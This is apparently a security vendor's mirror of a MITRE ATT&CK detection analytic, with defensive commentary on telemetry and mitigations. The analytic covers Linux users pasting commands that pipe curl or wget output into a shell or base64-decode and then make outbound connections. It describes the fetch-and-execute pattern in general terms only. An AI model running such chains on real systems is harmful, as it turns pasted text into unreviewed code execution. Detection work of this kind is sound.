Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0963: Analytic 0963

User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.

EnterpriseAN0963AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic describes a Linux user running a pasted shell command that retrieves or decodes content, executes it through a shell/interpreter, creates a short-lived file in temporary or cache locations, and then quickly reaches outbound. For leaders, the significance is that this pattern can bypass normal software deployment paths and turn a single terminal paste into unreviewed code execution and external connectivity.

Executive priority

Prioritize this as a control-validation and incident-readiness question for Linux workstations and servers: can the organization see interactive shell execution, temporary-file activity, and immediate egress well enough to decide whether a pasted command was legitimate administration or a potential compromise? It is relevant to SOC readiness, IR triage, acceptable-use governance, and audit evidence around endpoint logging and outbound network control.

Technical view

Validate coverage on Linux for bash/zsh terminal activity involving command chains that download or decode content and execute it via shell/interpreter behavior, followed by transient file creation under /tmp or ~/.cache and near-term outbound network activity. Because ATT&CK supplies no detection logic and no tactic mapping for this analytic, teams should treat it as a behavioral detection concept rather than a complete rule. Correlate process execution, command-line arguments, file creation/deletion, and network egress in a tight time window from the same user/session/host.

Likely telemetry

  • Linux process execution events with command line and parent/child process context
  • Interactive shell or terminal session evidence for bash/zsh where available
  • File creation, modification, and deletion events under /tmp and ~/.cache
  • Outbound network connection logs from the host, proxy, DNS, firewall, or EDR sensor
  • User, host, session, and timestamp context to correlate execution, file activity, and egress

Detection direction

  • Build correlation around sequence, not any single utility name: terminal-launched shell activity, retrieval or decoding behavior, execution by an interpreter, temporary/cache file use, and immediate outbound egress.
  • Tune for expected administrative and developer workflows that legitimately use shell pipelines, package bootstrapping, or scripted installers.
  • Prioritize high-fidelity context such as interactive user session, unusual destination, newly created transient file, and short time between execution and egress.
  • Check blind spots where command-line logging is disabled, endpoint sensors do not capture shell pipelines, network logs lack host/user attribution, or /tmp and ~/.cache file events are not collected.
  • Since no official detection text or relationships are supplied, validate locally with approved benign administrative scenarios before alerting broadly.

Mitigation priorities

  • Ensure Linux endpoint logging captures process command line, parent process, user, and relevant file activity in temporary/cache directories.
  • Apply least-privilege and administrative workflow controls so routine users do not need to run unreviewed pasted shell content for software installation or maintenance.
  • Control and monitor outbound egress from Linux systems, especially servers that should not initiate arbitrary external connections.
  • Document approved command-line installation and support procedures so SOC analysts can distinguish sanctioned activity from suspicious pasted-command execution.
  • Use detection engineering and IR playbooks to require rapid collection of process tree, user session, temporary files, and destination evidence when this behavior appears.
Analyst notes and limits

This is a detection analytic object, not a technique object. The supplied ATT&CK fields identify Linux as the platform and describe a terminal-paste execution chain, but provide no official detection logic, tactic mapping, aliases, labels, or relationship context. Glexia’s interpretation therefore focuses on defensive validation and telemetry requirements rather than asserting specific adversary use.

The object does not include official detection text, related techniques, campaigns, groups, software, mitigations, or data sources. Local environment baselines are required to determine normal administrative shell usage, expected outbound destinations, and whether temporary-file behavior is suspicious.

Official MITRE ATT&CK definition

Analytic 0963

User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
55b0598e1cedb077...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 55b0598e1ced…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0963
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use